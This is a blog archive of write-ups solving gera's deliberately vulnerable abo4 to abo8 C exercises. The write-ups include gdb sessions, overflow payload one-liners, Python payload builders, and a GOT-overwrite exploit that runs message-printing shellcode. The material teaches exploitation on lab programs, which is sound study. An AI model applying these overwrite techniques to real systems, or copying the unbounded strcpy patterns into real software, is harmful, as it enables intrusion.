Author Archive: mmishou

Insecure Programming by Example: abo6/7/8 Ménage à trois

This post will be pretty brief, as there are no significant differences in the solution for abo6.c from other previously covered exercises, while abo7.c and abo8.c are both not exploitable. The latter two exercises demonstrate important concepts regarding the placement of variously defined variables within memory for compiled C code which I’ll outline, but it won’t take long.

abo6.c

/* abo6.c                                       *
 * specially crafted to feed your brain by gera */

/* wwwhat'u talkin' about? */

int main(int argv,char **argc) {
    char *pbuf=malloc(strlen(argc[2])+1);
    char buf[256];

    strcpy(buf,argc[1]);
    strcpy(pbuf,argc[2]);
    while(1);
}

This code is much the same as the last exercise, with one important difference: instead of a call to exit(), the program ends in a while loop that never terminates. In the disassembly, this looks like the following:

0x08048428 :   call   0x80482f8
0x0804842d :   mov    eax,DWORD PTR [ebp+12]
0x08048430 :   add    eax,0x8
0x08048433 :   mov    eax,DWORD PTR [eax]
0x08048435 :   mov    DWORD PTR [esp+4],eax
0x08048439 :   mov    eax,DWORD PTR [ebp-12]
0x0804843c :   mov    DWORD PTR [esp],eax
0x0804843f :   call   0x80482f8
0x08048444 :   jmp    0x8048444 

So basically, it’s an unconditional jump that targets itself, and therefore it never ends. Since no library function such as exit is called after the copies, there is no GOT entry whose overwrite would hand us control later on. However, where there is a will there is a way, and we must keep in mind that we can still write arbitrarily to memory so long as permissions allow. The solution in this case is nothing revolutionary: we’ll directly overwrite the saved return address of the second strcpy call’s stack frame, so that strcpy itself returns to an address of our choosing. This is an important reminder by Gera that being able to write a value into memory is a tool with many applications, some of which I’m sure I’m not even aware of at this point.

The one tricky part of this solution is that you should not attempt to overwrite the saved return address of the second strcpy stack frame until you have located it while passing arguments of exactly the same size as the ones you will use for the overwrite. The location of the saved EIP for that stack frame changes with the length of the command-line arguments, because they are stored on the stack above main’s frame. In the debugger, here is what the solution looks like.

hacking@hacking-theart:~/InsecureProgramming $ gdb -q ./abo6
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disassemble main
Dump of assembler code for function main:
0x080483e4 :    push   ebp
0x080483e5 :    mov    ebp,esp
0x080483e7 :    sub    esp,0x128
0x080483ed :    and    esp,0xfffffff0
0x080483f0 :   mov    eax,0x0
0x080483f5 :   sub    esp,eax
0x080483f7 :   mov    eax,DWORD PTR [ebp+12]
0x080483fa :   add    eax,0x8
0x080483fd :   mov    eax,DWORD PTR [eax]
0x080483ff :   mov    DWORD PTR [esp],eax
0x08048402 :   call   0x80482e8
0x08048407 :   inc    eax
0x08048408 :   mov    DWORD PTR [esp],eax
0x0804840b :   call   0x8048308
0x08048410 :   mov    DWORD PTR [ebp-12],eax
0x08048413 :   mov    eax,DWORD PTR [ebp+12]
0x08048416 :   add    eax,0x4
0x08048419 :   mov    eax,DWORD PTR [eax]
0x0804841b :   mov    DWORD PTR [esp+4],eax
0x0804841f :   lea    eax,[ebp-0x118]
0x08048425 :   mov    DWORD PTR [esp],eax
0x08048428 :   call   0x80482f8
0x0804842d :   mov    eax,DWORD PTR [ebp+12]
0x08048430 :   add    eax,0x8
0x08048433 :   mov    eax,DWORD PTR [eax]
0x08048435 :   mov    DWORD PTR [esp+4],eax
0x08048439 :   mov    eax,DWORD PTR [ebp-12]
0x0804843c :   mov    DWORD PTR [esp],eax
0x0804843f :   call   0x80482f8
---Type <return> to continue, or q <return> to quit---
0x08048444 :   jmp    0x8048444
End of assembler dump.
(gdb) break *0x0804843f
Breakpoint 1 at 0x804843f: file abo6.c, line 11.
(gdb) run one two
Starting program: /home/hacking/InsecureProgramming/abo6 one two

Breakpoint 1, 0x0804843f in main (argv=3, argc=0xbffff874) at abo6.c:11
11              strcpy(pbuf,argc[2]);
(gdb) x buf
0xbffff6d0:     0x00656e6f
(gdb) x &pbuf
0xbffff7dc:     0x0804a008
(gdb) print/d 0xbffff7dc - 0xbffff6d0
$1 = 268
(gdb) run $(perl -e 'print "A" x 268 . "BBBB";') CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/hacking/InsecureProgramming/abo6 $(perl -e 'print "A" x 268 . "BBBB";') CCCC

Breakpoint 1, 0x0804843f in main (argv=3, argc=0xbffff764) at abo6.c:11
11              strcpy(pbuf,argc[2]);
(gdb) stepi
0x080482f8 in strcpy@plt ()
(gdb) where
#0  0x080482f8 in strcpy@plt ()
#1  0x08048444 in main (argv=3, argc=0xbffff764) at abo6.c:11
(gdb) info frame 0
Stack frame at 0xbffff5b0:
 eip = 0x80482f8 in strcpy@plt; saved eip 0x8048444
 called by frame at 0xbffff6e0
 Arglist at 0xbffff5a8, args:
 Locals at 0xbffff5a8, Previous frame's sp is 0xbffff5b0
 Saved registers:
  eip at 0xbffff5ac
(gdb) run $(perl -e 'print "A" x 268 . "\xac\xf5\xff\xbf";') BBBB
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/hacking/InsecureProgramming/abo6 $(perl -e 'print "A" x 268 . "\xac\xf5\xff\xbf";') BBBB

Breakpoint 1, 0x0804843f in main (argv=3, argc=0xbffff764) at abo6.c:11
11              strcpy(pbuf,argc[2]);
(gdb) next

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
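
For anyone who would rather build the two arguments in a script than in a perl one-liner, here is a minimal sketch of the same payload. The 268-byte distance and the saved EIP location are the values read out of the gdb session above; the function name build_args is just something I made up for illustration, and the addresses will differ on your system.

```python
import struct

PAD_LEN = 268            # distance from buf to pbuf, measured in gdb above
SAVED_EIP = 0xbffff5ac   # "eip at" value from `info frame 0` (system specific)

def build_args(saved_eip_addr, new_eip):
    """Return (arg1, arg2) as bytes for the abo6-style overwrite.

    arg1 fills buf and replaces pbuf with the address of the saved EIP;
    arg2 is the value that the second strcpy writes there.
    """
    arg1 = b"A" * PAD_LEN + struct.pack("<I", saved_eip_addr)  # little-endian
    arg2 = struct.pack("<I", new_eip)
    return arg1, arg2

arg1, arg2 = build_args(SAVED_EIP, 0x42424242)
print(len(arg1), arg1[-4:].hex(), arg2)
```

The first argument is 272 bytes long in total, which is why the saved EIP has to be located with arguments of that same size.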

abo7.c and abo8.c

As mentioned previously, these two exercises are unexploitable. They highlight where variables are placed in memory depending on how they are declared in C.

abo7.c

/* abo7.c                                       *
 * specially crafted to feed your brain by gera */

/* sometimes you can,       *
 * sometimes you don't      *
 * that's what life's about */

char buf[256]={1};

int main(int argv,char **argc) {
    strcpy(buf,argc[1]);
}

Here you have an initialized global variable in the form of buf. You can see pretty easily using the versatile objdump command that while this is a legitimate buffer overflow (using an unbounded function like strcpy), the location of this variable precludes any useful behavior for taking control of the program.

hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo7 | grep buf
080495a0 g     O .data  00000100              buf
hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo7

abo7:     file format elf32-i386
abo7
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x080482b0
<...snip>
 10 .plt          00000040  08048270  08048270  00000270  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text         000001a0  080482b0  080482b0  000002b0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini         0000001c  08048450  08048450  00000450  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       00000008  0804846c  0804846c  0000046c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .eh_frame     00000004  08048474  08048474  00000474  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 15 .ctors        00000008  08049478  08049478  00000478  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .dtors        00000008  08049480  08049480  00000480  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .jcr          00000004  08049488  08049488  00000488  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dynamic      000000c8  0804948c  0804948c  0000048c  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .got          00000004  08049554  08049554  00000554  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .got.plt      00000018  08049558  08049558  00000558  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .data         00000120  08049580  08049580  00000580  2**5
                  CONTENTS, ALLOC, LOAD, DATA
 22 .bss          00000004  080496a0  080496a0  000006a0  2**2
                  ALLOC

080495a0 g     O .data  00000100              buf
080496a0 g       *ABS*  00000000              _edata
08048419 g     F .text  00000000              .hidden __i686.get_pc_thunk.bx
08048374 g     F .text  0000002a              main
08048258 g     F .init  00000000              _init

abo8.c

Gera says: Don’t stay static

/* abo8.c                                       *
 * specially crafted to feed your brain by gera */

/* spot the difference */

char buf[256];

int main(int argv,char **argc) {
	strcpy(buf,argc[1]);
}

Gera continues: From the top of your head, what do you think is generally more safe, a program dynamically linked to its libraries or one statically linked to them? Now go and try it out!

In this next example, very similar restrictions apply, with Gera challenging you to spot the difference between the two. Since buf in this case is uninitialized, it is stored in the .bss section of the ELF executable.

hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo8 | grep buf
080495a0 g     O .bss   00000100              buf
hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo8

abo8:     file format elf32-i386
abo8
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x080482b0
<...snip...>
 10 .plt          00000040  08048270  08048270  00000270  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text         000001a0  080482b0  080482b0  000002b0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini         0000001c  08048450  08048450  00000450  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       00000008  0804846c  0804846c  0000046c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .eh_frame     00000004  08048474  08048474  00000474  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 15 .ctors        00000008  08049478  08049478  00000478  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .dtors        00000008  08049480  08049480  00000480  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .jcr          00000004  08049488  08049488  00000488  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dynamic      000000c8  0804948c  0804948c  0000048c  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .got          00000004  08049554  08049554  00000554  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .got.plt      00000018  08049558  08049558  00000558  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .data         0000000c  08049570  08049570  00000570  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 22 .bss          00000120  08049580  08049580  0000057c  2**5
                  ALLOC
 23 .comment      0000012f  00000000  00000000  0000057c  2**0
                  CONTENTS, READONLY
<...snip...>
080495a0 g     O .bss   00000100              buf
0804957c g       *ABS*  00000000              _edata
08048419 g     F .text  00000000              .hidden __i686.get_pc_thunk.bx
08048374 g     F .text  0000002a              main
08048258 g     F .init  00000000              _init
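
To make the layout argument a bit more concrete, here is a small sketch that takes the section addresses and sizes from the two objdump listings above and asks which sections an overflow running forward from buf could touch. The helper name reachable_sections is my own, and the numbers are copied by hand from these particular builds, so treat it as arithmetic on this output rather than a general rule.

```python
# (name, start address, size) copied from the objdump -x output above
ABO7_SECTIONS = [
    (".ctors", 0x08049478, 0x08), (".dtors", 0x08049480, 0x08),
    (".got", 0x08049554, 0x04), (".got.plt", 0x08049558, 0x18),
    (".data", 0x08049580, 0x120), (".bss", 0x080496a0, 0x04),
]
ABO8_SECTIONS = [
    (".ctors", 0x08049478, 0x08), (".dtors", 0x08049480, 0x08),
    (".got", 0x08049554, 0x04), (".got.plt", 0x08049558, 0x18),
    (".data", 0x08049570, 0x0c), (".bss", 0x08049580, 0x120),
]
BUF_ADDR, BUF_SIZE = 0x080495a0, 0x100   # same symbol address in both builds

def reachable_sections(buf_addr, sections):
    """Sections that extend past buf_addr, i.e. that a copy starting at
    buf and running toward higher addresses could write into."""
    return [name for name, start, size in sections if start + size > buf_addr]

abo7 = reachable_sections(BUF_ADDR, ABO7_SECTIONS)
abo8 = reachable_sections(BUF_ADDR, ABO8_SECTIONS)
print(abo7, abo8, hex(BUF_ADDR + BUF_SIZE))
```

In both listings .ctors, .dtors, .got and .got.plt sit at lower addresses than buf, so a strcpy that only ever writes upward from buf never passes over them.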

I’m a little disconcerted that I’m not sure what Gera was driving at with his hints in this one. I’ve been over and over it, and I’m pretty sure the compilation options don’t matter. If you were to compile this as a statically-linked executable, you’d still have almost nothing to work with to control execution, because buf still lives in a memory region where a buffer overflow is pretty much useless. I’m sure there is some point, but I don’t see it. It may be that with an older compiler on an older distribution this example had some useful lessons to teach; certainly the point about .data versus .bss is well taken. In a previous exercise, I alluded to a paper by Juan M. Bello Rivas (see Books & Pubs for more) on overwriting .dtors 0xFFFFFFFF values to redirect execution, which I think would also have some possibilities for these examples, but I don’t have an old enough system to test on.

For the last word on this particular issue (and the general usefulness of control of variables in these sections) I’d like to provide an excerpt from the book The Art of Software Security Assessment by Mark Dowd, John McDonald, and Justin Schuh. This book is a nice resource to have; if you don’t already own it, I’d recommend purchasing a copy and keeping it on the shelf as a pre-Google resource or jumping-off point.

Global and Static Data Overflows

Global and static variables are used to store data that persists between different function calls, so they are generally stored in a different memory segment than stack and heap variables are. Normally, these locations don’t contain general program runtime data structures, such as stack activation records and heap chunk data, so exploiting an overflow in this segment requires application-specific attacks similar to the vulnerability in Listing 5-2. Exploitability depends on what variables can be corrupted when the buffer overflow occurs and how the variables are used. For example, if pointer variables can be corrupted, the likelihood of exploitation increases, as this corruption introduces the possibility for arbitrary memory overwrites.

Listing 5-2

Off-by-One Length Miscalculation

int authenticate(char *username, char *password)
{
    int authenticated;
    char buffer[1024];

    authenticated = verify_password(username, password);

    if(authenticated == 0)
    {
        sprintf(buffer, "password is incorrect for user %s\n", username);
        log("%s", buffer);
    }

    return authenticated;
}

Next up, we screw with malloc and make it do what we want, trying to learn something about its implementation to boot.


Insecure Programming by Example: abo5.c we GOT this…

Introduction

I actually solved this one a bit ago, while messing around at the GFIRST 2010 conference in San Antonio. Just now getting around to writing it up.

Here is the code for abo5.c:

Gera says: ch-ch-ch-changes

/* abo5.c                                                  *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* You take the blue pill, you wake up in your bed,    *
 *     and you believe what you want to believe        *
 * You take the red pill,                              *
 *     and I'll show you how deep goes the rabbit hole */

int main(int argv,char **argc) {
	char *pbuf=malloc(strlen(argc[2])+1);
	char buf[256];

	strcpy(buf,argc[1]);
	for (;*pbuf++=*(argc[2]++););
	exit(1);
}

Use your sixth sense, will you be able to gain control given the possibility of writing wherever you wish in memory?

As you can see, this is very similar code to the abo4.c exercise. Gera’s words are the keys to this exercise…as is often the case he’s given us a clue. We know very well from our previous trials and tribulations with abo4.c that by overflowing buf and overwriting the pbuf pointer stored on the stack, we can essentially control 4 bytes of data at an arbitrary writeable location in the memory of the running process. This ends up being the key to successful exploitation of this code snippet.

Disassembly

Let’s take a look at the disassembled code, with the important bits highlighted.

(gdb) disassemble main
Dump of assembler code for function main:
0x08048414 <main+0>:    push   ebp
0x08048415 <main+1>:    mov    ebp,esp
0x08048417 <main+3>:    sub    esp,0x128
0x0804841d <main+9>:    and    esp,0xfffffff0
0x08048420 <main+12>:   mov    eax,0x0
0x08048425 <main+17>:   sub    esp,eax
0x08048427 <main+19>:   mov    eax,DWORD PTR [ebp+12]
0x0804842a <main+22>:   add    eax,0x8
0x0804842d <main+25>:   mov    eax,DWORD PTR [eax]
0x0804842f <main+27>:   mov    DWORD PTR [esp],eax
0x08048432 <main+30>:   call   0x804830c <strlen@plt>
0x08048437 <main+35>:   inc    eax
0x08048438 <main+36>:   mov    DWORD PTR [esp],eax
0x0804843b <main+39>:   call   0x804832c <malloc@plt>
0x08048440 <main+44>:   mov    DWORD PTR [ebp-12],eax
0x08048443 <main+47>:   mov    eax,DWORD PTR [ebp+12]
0x08048446 <main+50>:   add    eax,0x4
0x08048449 <main+53>:   mov    eax,DWORD PTR [eax]
0x0804844b <main+55>:   mov    DWORD PTR [esp+4],eax
0x0804844f <main+59>:   lea    eax,[ebp-0x118]
0x08048455 <main+65>:   mov    DWORD PTR [esp],eax
0x08048458 <main+68>:   call   0x804831c <strcpy@plt>
0x0804845d <main+73>:   mov    eax,DWORD PTR [ebp-12]
0x08048460 <main+76>:   mov    ecx,eax
0x08048462 <main+78>:   mov    eax,DWORD PTR [ebp+12]
0x08048465 <main+81>:   add    eax,0x8
0x08048468 <main+84>:   mov    edx,DWORD PTR [eax]
0x0804846a <main+86>:   movzx  edx,BYTE PTR [edx]
0x0804846d <main+89>:   inc    DWORD PTR [eax]
0x0804846f <main+91>:   mov    BYTE PTR [ecx],dl
0x08048471 <main+93>:   lea    eax,[ebp-12]
0x08048474 <main+96>:   inc    DWORD PTR [eax]
0x08048476 <main+98>:   test   dl,dl
0x08048478 <main+100>:  jne    0x804845d <main+73>
0x0804847a <main+102>:  mov    DWORD PTR [esp],0x1
0x08048481 <main+109>:  call   0x804833c <exit@plt>
End of assembler dump.

The first highlighted line is the call to strcpy (main+68), which copies the first command-line argument into buf and, if that argument is long enough, overwrites the pbuf pointer stored above it. The bit between the first and second highlighted lines is the implementation of the for loop, which copies the second command-line argument to wherever pbuf now points, and the second highlighted line is the call to exit (main+109). As you can see in the disassembly and when reviewing the source, this code is slightly different from the previous pointer-overwrite exercise in that there is no call through a function pointer afterward, so we can’t control execution in that manner. We could do a saved return address overwrite, since we essentially have control over a single DWORD in writeable memory (the stack being a writeable memory location, of course), but unfortunately main never returns because of that pesky call to exit.

Actually if you’ve taken a look, you’ve realized that pretty much the only thing that happens after we overwrite the pointer value is a call to exit. Hmm…how can we use this to our advantage? Well first, you’ll note that the call to the exit routine is actually not as clear cut as it seems. It’s actually a call to a pointer in memory…perhaps we can control this call location?

Dynamic Linking

The reason that this call is exploitable is that the program is dynamically linked. The gist of dynamic linking is that a program can be compiled with references to external functions (functions declared in a header such as stdio.h, like printf, but implemented in a separately compiled library) which are resolved at load time or run time. Linking and loading are beyond the scope of this article, and indeed my knowledge; you may sometimes hear this referred to as run time linking for that reason. This is what .dll files on Windows are for, and .so files on Linux and UNIX. Essentially, they contain functions that might be useful to have on the system, or functions that the C or C++ standards specify must be available, and they allow those functions to be shared among multiple programs without compiling them directly into each one. This provides a few advantages. Off the top of my head, the most obvious ones are that a bug in a commonly used function can be fixed once and the fix propagates to all the code that uses it, and that the compiled size and complexity of a given code base are reduced. In all of these operating systems that use dynamic linking there is some sort of lookup table that allows programs to resolve run-time linked functions. On Linux and UNIX this lookup table is called the GOT, or Global Offset Table, and it works in close conjunction with another structure called the Procedure Linkage Table, or PLT.
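
As a rough mental model of that lookup table (and nothing more than a model), here is a toy sketch in which the GOT is a dictionary with one writable slot per imported function and the PLT stub is a function that always goes through that slot. All of the names here (got, plt_stub, real_exit, hijack) are invented for illustration, and the sketch deliberately ignores lazy binding and everything else the real dynamic linker does.

```python
def real_exit(status):
    """Stand-in for the library's exit()."""
    return "exit(%d)" % status

def hijack(status):
    """Stand-in for code the attacker would rather run."""
    return "you win!"

# Toy GOT: one writable slot per imported function.
got = {"exit": real_exit}

def plt_stub(name, *args):
    """Toy PLT entry: never calls the function directly, always jumps
    through whatever the GOT slot currently holds."""
    return got[name](*args)

before = plt_stub("exit", 1)
got["exit"] = hijack          # the effect of an arbitrary 4-byte write
after = plt_stub("exit", 1)
print(before, "->", after)
```

The calling code never changes; only the slot it reads from does, which is why a single pointer-sized write is enough.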

Taking a Look Under the Hood

There is a lot of documentation to be found describing the structure and implementation of the GOT and PLT on Linux machines, and I’ve included some that I’ve found useful at the end of this post. In this case, I think I’d rather just take a look at the assembly and let that point us in the right direction. Honestly, so long as you understand that you can write an arbitrary 4-byte value anywhere you want to (that is writeable and won’t produce a segfault) you can reason out what to do here without knowing much or at all about the GOT or PLT.

Let’s step through the call to exit and see what we find.

0x08048481 <main+109>:  call   0x804833c <exit@plt>
End of assembler dump.
(gdb) x/i 0x804833c
0x804833c <exit@plt>:   jmp    DWORD PTR ds:0x8049668
(gdb) x/xw 0x8049668
0x8049668 <_GLOBAL_OFFSET_TABLE_+32>:   0x08048342

First we’ve got displayed the call to 0x804833c, which is the location of exit in the aforementioned PLT. Examining the instruction at that address shows an unconditional jump to the address contained in a pointer. This pointer, as you can see from the results of the final command we ran, is in the GOT, and contains the value 0x08048342. If we overwrite that value with the address of some shellcode, we’ll have control of execution when exit is called. Here is what that would look like.

First we’ll determine the distance between the address of buf and pbuf on the stack.

(gdb) break 1
Breakpoint 2 at 0x8048414: file abo5.c, line 1.
(gdb) run one two
Starting program: /home/hacking/InsecureProgramming/abo5 one two

Breakpoint 2, main (argv=134513684, argc=0x3) at abo5.c:9
9       int main(int argv,char **argc) {
(gdb) x/x &buf
0xbffff730:     0x0804819c
(gdb) x/x &pbuf
0xbffff83c:     0xb8000ff4
(gdb) print/d 0xbffff83c - 0xbffff730
$4 = 268
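
The same number can be read straight off the disassembly, which makes a nice sanity check on the gdb measurement. The lea at main+59 takes the address of buf as ebp-0x118, and the store at main+44 puts malloc's return value (pbuf) at ebp-12. A quick sketch of the arithmetic, using only values shown above:

```python
BUF_BELOW_EBP = 0x118    # lea eax,[ebp-0x118]       -> &buf
PBUF_BELOW_EBP = 12      # mov DWORD PTR [ebp-12],eax -> pbuf

# buf starts lower in memory than pbuf, so the gap is the difference
distance = BUF_BELOW_EBP - PBUF_BELOW_EBP
measured = 0xbffff83c - 0xbffff730   # &pbuf - &buf from the gdb session

print(distance, measured)
```

Both come out to 268, so the padding does not depend on where the stack happens to land on a given run, only on how the compiler laid out main's frame.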

Then we’ll do our at-this-point-very-common magic with the shellcode we’ve been using all along, the address on the GOT for exit, the getenvaddr.c code that was generously provided by Hacking: The Art of Exploitation, and all the rest.

hacking@hacking-theart:~/InsecureProgramming $ hexdump -C print_youwin_shellcode
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 0a cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21 0a 0d                                       |n!..|
00000024
hacking@hacking-theart:~/InsecureProgramming $ export SHELLCODE=$(cat print_youwin_shellcode)
hacking@hacking-theart:~/InsecureProgramming $ echo $SHELLCODE
?Y1??1?C1? ??K??????you win!
hacking@hacking-theart:~/InsecureProgramming $ ./getenvaddr SHELLCODE ./abo5
SHELLCODE will be at 0xbffff9ec
hacking@hacking-theart:~/InsecureProgramming $ ./abo5 $(perl -e 'print "A" x 268 . "\x68\x96\x04\x08";') $(perl -e 'print "\xec\xf9\xff\xbf";')
you win!
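
One thing worth checking before firing off a command line like that is whether the packed addresses contain bytes that will not survive the trip. A NUL byte ends the string as far as strcpy and argv are concerned, and a space, tab or newline will be split into separate arguments by the shell when the $(...) is unquoted. Here is a small sketch of that check; pack_addr is a hypothetical helper of mine, and the two addresses are the ones from the session above.

```python
import struct

GOT_EXIT = 0x08049668     # GOT slot used by exit@plt (from gdb above)
SHELLCODE = 0xbffff9ec    # address reported by getenvaddr above
BAD_BYTES = b"\x00 \t\n"  # NUL ends the string; whitespace splits the argument

def pack_addr(addr):
    """Pack a 32-bit address little-endian, refusing troublesome bytes."""
    raw = struct.pack("<I", addr)
    if any(b in BAD_BYTES for b in raw):
        raise ValueError("address 0x%08x contains a bad byte" % addr)
    return raw

arg1 = b"A" * 268 + pack_addr(GOT_EXIT)   # overflows buf, repoints pbuf
arg2 = pack_addr(SHELLCODE)               # value written into the GOT slot
print(arg1[-4:].hex(), arg2.hex())
```

If pack_addr raises, the usual workaround is to shift things around (a different environment variable length, for instance) until the address is clean.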

There we go, that’s all for now :-).

References

I didn’t really use these references to develop this post, but in perusing them I thought they’d be useful for someone wanting a bit more in-depth explanation of some of the concepts in here.

Executable and Linking Format (ELF) by unknown author, Tool Interface Standards, Portable Formats Specification, Ver 1.1
Dynamic Linking in Linux and Windows by Reji Thomas and Bhasker Reddy, Symantec
Understanding Memory by University of Alberta AICT Research and Support

Insecure Programming by Example: abo4.c POINTER MADNESS

Introduction

I love sensational titles.

Here is abo4.c:

/* abo4.c                                                    *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* After this one, the next is just an Eureka! away          */

extern system,puts;
void (*fn)(char*)=(void(*)(char*))&system;

int main(int argv,char **argc) {
	char *pbuf=malloc(strlen(argc[2])+1);
	char buf[256];

	fn=(void(*)(char*))&puts;
	strcpy(buf,argc[1]);
	strcpy(pbuf,argc[2]);
	fn(argc[3]);
	while(1);
}

Gera says:

oh pointers, pointers!
Do you remember when you had problems with * and &? everybody has that kind of problems at least once when learning C, what about pointers to pointers? let’s see…

There are a few elements of this that we should go over before we review the disassembly itself. Reviewing the disassembly will prove to be the most fruitful way to attack most problems like this, but it seems to me there’s lots of C here that we haven’t seen before.

First, let’s address the use of the extern keyword. From what I can tell, system and puts are declared this way so that we can apply the unary address-of operator to them without including the headers that normally declare them (stdio.h for puts and stdlib.h for system). I’d love to be corrected, I’m no C ninja, but other than that I can’t see the point of it. Some documentation on extern is available here, if you want to peruse it on your own…this is what led me to this conclusion.

Now for the life of me, I can’t figure out what the heck he’s doing on the next line with the void pointer to system, I should email him and ask but I hear he’s a busy guy ;-). Maybe that one will come out in the comments as well. The pointer bits are important though, as we’ll see in a bit.

The last thing we should mention here is the usage of malloc within main to allocate a buffer, as I think this is the first time it’s come up. Documentation on the usage of malloc can be found here. Essentially, this code declares a pointer to char (1 byte in size, for the purposes of pointer arithmetic) and points it at the block of memory returned by malloc. The size requested from malloc is the length of the second argument submitted to main plus one byte…the extra byte leaves room for the terminating null byte that strcpy copies along with the string; without it, the copy would run one byte past the end of the allocated chunk.

In the Debugger

Now let’s take a look at the disassembly of the program itself once it’s compiled in GCC, using our favorite debugger GDB.

(gdb) disassemble main
Dump of assembler code for function main:
0x08048444 : push ebp
0x08048445 : mov ebp,esp
0x08048447 <main+3>: sub esp,0x128
0x0804844d : and esp,0xfffffff0
0x08048450 : mov eax,0x0
0x08048455 : sub esp,eax
0x08048457 : mov eax,DWORD PTR [ebp+12]
0x0804845a : add eax,0x8
0x0804845d : mov eax,DWORD PTR [eax]
0x0804845f : mov DWORD PTR [esp],eax
0x08048462 <main+30>: call 0x8048340 <strlen@plt>
0x08048467 : inc eax
0x08048468 : mov DWORD PTR [esp],eax
0x0804846b : call 0x8048360
0x08048470 : mov DWORD PTR [ebp-12],eax
0x08048473 : mov DWORD PTR ds:0x80496bc,0x8048370
0x0804847d : mov eax,DWORD PTR [ebp+12]
0x08048480 : add eax,0x4
0x08048483 : mov eax,DWORD PTR [eax]
0x08048485 : mov DWORD PTR [esp+4],eax
0x08048489 : lea eax,[ebp-0x118]
0x0804848f : mov DWORD PTR [esp],eax
0x08048492 <main+78>: call 0x8048350 <strcpy@plt>
0x08048497 : mov eax,DWORD PTR [ebp+12]
0x0804849a : add eax,0x8
0x0804849d : mov eax,DWORD PTR [eax]
0x0804849f : mov DWORD PTR [esp+4],eax
0x080484a3 : mov eax,DWORD PTR [ebp-12]
0x080484a6 : mov DWORD PTR [esp],eax
0x080484a9 : call 0x8048350
0x080484ae : mov eax,DWORD PTR [ebp+12]
0x080484b1 : add eax,0xc
0x080484b4 : mov eax,DWORD PTR [eax]
0x080484b6 : mov DWORD PTR [esp],eax
0x080484b9 : mov eax,ds:0x80496bc
0x080484be : call eax
0x080484c0 : jmp 0x80484c0
End of assembler dump.

I’ve taken the liberty of highlighting the function calls. It seems to me that any time you see a call eax your ears should prick up. This is the spot where we have to exploit the program, as right after that you have an unconditional jump to itself, the infinite loop at the end of the program which prevents us from overwriting the saved return address and exploiting upon exit from main.

What we have with this program is essentially two insecure functions, and then a call to a program-defined function which is a pointer stored at 0x80496bc…if we can somehow modify what address is here, we can control execution of the program and win.

Draw the Stack

Let’s take a look at the variables on the stack, which we can likely control with our wonderful unbounded strcpy call.

(gdb) x
0xbffff730: 0x080481b0
(gdb) x
0xbffff83c: 0xb8000ff4
(gdb) x
0x80496bc : 0x08048320
(gdb) print 0xbffff83c - 0xbffff730
$1 = 268

Your spider sense should be tingling here. Let’s ask ourselves what the program is doing…first it copies via an insecure function an unbounded amount of data to the stack. The same stack that contains the pointer to which another insecure function will be used to copy to. This fatal combination of (intentional and educational!) errors allows us to write any amount of data we want to an arbitrary write-able location in the program’s memory. We can use this to our advantage and overwrite the address stored in the fn function pointer, and essentially execute wherever we wish.
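
If it helps to see that chain of events play out, here is a toy simulation of the two copies. It models memory as a sparse dictionary and reuses the addresses seen in this post (buf, pbuf, fn, and the value stored in fn by the disassembly), but everything else, including the helper names and the heap address, is made up for illustration. It is a sketch of the idea, not of the real process.

```python
import struct

mem = {}   # sparse toy memory: address -> byte value

def write(addr, data):
    for i, b in enumerate(data):
        mem[addr + i] = b

def read32(addr):
    raw = bytes(mem.get(addr + i, 0) for i in range(4))
    return struct.unpack("<I", raw)[0]

def c_strcpy(dst, src):
    """Copy up to and including the first NUL, with no bounds check."""
    write(dst, src.split(b"\x00")[0] + b"\x00")

BUF, PBUF, FN = 0xbffff730, 0xbffff83c, 0x080496bc   # addresses from gdb
HEAP = 0x0804a008                                    # assumed malloc result

write(PBUF, struct.pack("<I", HEAP))        # pbuf = malloc(...)
write(FN, struct.pack("<I", 0x08048370))    # fn = &puts

arg1 = b"A" * 268 + struct.pack("<I", FN)   # junk, then the address of fn
arg2 = b"AAAA"

c_strcpy(BUF, arg1)            # strcpy(buf, argc[1]) runs over pbuf
pbuf_after = read32(PBUF)
c_strcpy(pbuf_after, arg2)     # strcpy(pbuf, argc[2]) now writes to fn
fn_after = read32(FN)
print(hex(pbuf_after), hex(fn_after))
```

The first copy decides where the second copy lands, and the second copy decides what gets called.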

